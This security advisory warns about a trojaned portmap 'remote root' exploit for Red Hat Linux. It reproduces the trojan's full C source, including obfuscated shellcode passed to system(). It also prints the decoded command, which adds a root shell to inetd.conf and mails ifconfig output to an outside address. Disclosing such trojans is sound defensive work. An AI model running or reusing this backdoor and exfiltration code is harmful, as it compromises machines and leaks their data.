A Trojaned version of the portmap exploit is being spread on the net. The
Trojan claims to exploit the portmap vulnerability on Redhat boxes, but
what it really does is add a 'root shell' (unprotected access, also called
a backdoor) to the inetd.conf file and send other information, such as your IP
address as reported by ifconfig. All this information is sent to the email:
[email protected]. If your firewall can block outgoing mail
by recipient address, watch for mail to this address, as it indicates one of your
users ran the backdoored exploit.
The actual "shell code" that gets executed follows: /bin/echo "65139 stream tcp nowait root /bin/sh sh -i" >> /etc/inetd.conf ; /bin/killall -1 inetd 2>&1 1>/dev/null ; /sbin/ifconfig -a | mail [email protected] 2>&1 2>/dev/null The exploit code that is currently distributed (DO NOT USE): /* Do not run unless you know what you are doing , and DONT RUN IT AS ROOT. It Puts a ROOTSHELL in your inetd.conf and mails them your IP address. PRIVATE !!! DO NOT DISTRIBUTE THIS !!! PRIVATE (DOnT RUN its a TROJAN) portmap remote root linux exploit (TROJAN) (no stack patch) by horizon - [email protected] This was tested against redhat box with 2.2.9 kernel. (shouldn't need offset) BIG thanks to stran9er who wrote this shellcode!! greets to: #!ADM and users @ el8.org ;) */ #include <stdio.h> #include <string.h> #include <netdb.h> #include <rpc/rpc.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <sys/time.h> #include <sys/types.h> #include <unistd.h> #define NOP 0x90 #define RET 0xbfffec90 #define PORT 5760 #define pmap_proc_p system char *shellcode = "\x64\x97\x9e\xa3\x64\x9a\x98\x9d\xa4\x55\x57\x6b\x6a\x66\x68\x6e\x55\xa8\xa9" "\xa7\x9a\x96\xa2\x55\xa9\x98\xa5\x55\xa3\xa4\xac\x96\x9e\xa9\x55\xa7\xa4\xa4" "\xa9\x55\x64\x97\x9e\xa3\x64\xa8\x9d\x55\xa8\x9d\x55\x62\x9e\x57\x55\x73\x73" "\x55\x64\x9a\xa9\x98\x64\x9e\xa3\x9a\xa9\x99\x63\x98\xa4\xa3\x9b\x55\x70\x55" "\x64\x97\x9e\xa3\x64\xa0\x9e\xa1\xa1\x96\xa1\xa1\x55\x62\x66\x55\x9e\xa3\x9a" "\xa9\x99\x55\x67\x73\x5b\x66\x55\x66\x73\x64\x99\x9a\xab\x64\xa3\xaa\xa1\xa1" "\x55\x70\x55\x64\xa8\x97\x9e\xa3\x64\x9e\x9b\x98\xa4\xa3\x9b\x9e\x9c\x55\x62" "\x96\x55\xb1\x55\xa2\x96\x9e\xa1\x55\x9c\xa4\x96\xa9\x66\x6d\x6c\x75\x9d\xa4" "\xa9\xa2\x96\x9e\xa1\x63\x98\xa4\xa2\x55\x67\x73\x5b\x66\x55\x67\x73\x64\x99" "\x9a\xab\x64\xa3\xaa\xa1\xa1\x3f"; int max(int x, int y) { if(x > y) return(x); return(y); } void rshell(char *host) { int sockfd, maxfd, n; struct sockaddr_in cli; char sendln[1024], recvln[1024]; 
struct hostent *hp; fd_set rset; if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){ perror("socket"); exit(-1); } if((hp = gethostbyname(host)) == NULL){ perror("gethostbyname"); exit(-1); } bzero(&cli, sizeof(cli)); cli.sin_family = AF_INET; cli.sin_port = htons(PORT); cli.sin_addr.s_addr = inet_addr(host); if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){ perror("connect"); exit(-1); } printf("root shell found!\n"); strcpy(sendln, "uname -a; pwd; id;\n"); write(sockfd, sendln, strlen(sendln)); FD_ZERO(&rset); for(;;){ FD_SET(fileno(stdin), &rset); FD_SET(sockfd, &rset); maxfd = max(fileno(stdin), sockfd) + 1; select(maxfd, &rset, NULL, NULL, NULL); if(FD_ISSET(fileno(stdin), &rset)){ bzero(sendln, sizeof(sendln)); fgets(sendln, sizeof(sendln)-2, stdin); write(sockfd, sendln, strlen(sendln)); } if(FD_ISSET(sockfd, &rset)){ bzero(recvln, sizeof(recvln)); if((n = read(sockfd, recvln, sizeof(recvln))) == 0){ printf("Connection closed.\n"); exit(0); } if(n < 0){ perror("read"); exit(-1); } fputs(recvln, stdout); } } } void main(int argc, char **argv) { CLIENT *cli; int i = 0, offset = 53; char *portmap; char *buf; if(argc < 2){ printf("usage: %s <ip> [offset]\n", argv[0]); exit(-1); } if((portmap = (char *) malloc(154)) == NULL) { perror("malloc"); } while(*shellcode) { portmap[i] = *shellcode - offset; shellcode++; i++; } pmap_proc_p(portmap); printf("sending shellcode... connecting to remote host\n"); rshell(argv[1]); strcpy(buf, portmap); exit(-1); } A few Trojaned ADM exploits seem to be floating around as well: ADMnlockd portmap.c ADMmountd2.tgz ADM has set up a 'FAKES' archive on their official ftp server. You can find all those fake ADM exploits at: ftp://adm.freelsd.net/pub/ADM/FAKES/ |
Additional information
The above information was provided by: goatkiller and Wakko Ellington Warner-Warner III.